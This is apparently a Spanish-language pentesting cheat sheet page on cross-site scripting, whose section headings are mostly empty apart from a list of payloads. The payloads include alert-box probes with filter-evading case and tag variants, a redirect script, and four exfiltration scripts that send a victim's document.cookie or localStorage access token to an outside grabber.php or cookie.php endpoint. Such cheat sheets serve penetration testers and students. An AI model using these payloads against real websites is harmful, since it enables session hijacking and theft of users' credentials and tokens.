Cross-Site Scripting (XSS)
Definición
Clasificación
Payloads
Alert box
<img src=x onerror=alert(1)>
<ScRiPt>alert(1)</sCriPt>
<image/src/onerror=prompt(8)>Redirección
<script>window.location.href="https://r4z0r.gitbook.io"</script>Exfiltración
<script>document.location='https://r4z0r.gitbook.io/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='https://r4z0r.gitbook.io/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="https://r4z0r.gitbook.io/cookie.php?c="+document.cookie;</script>
<script>new Image().src="https://r4z0r.gitbook.io/cookie.php?c="+localStorage.getItem('access_token');</script>XSS Unrestricted File Upload
XSS + Unrestircted File Upload + Bypass CSP y CORS


XSS para descargar malware
All in one payload:
Lab Portswigger:
CSRF
BXSS Hunter

Recursos
Última actualización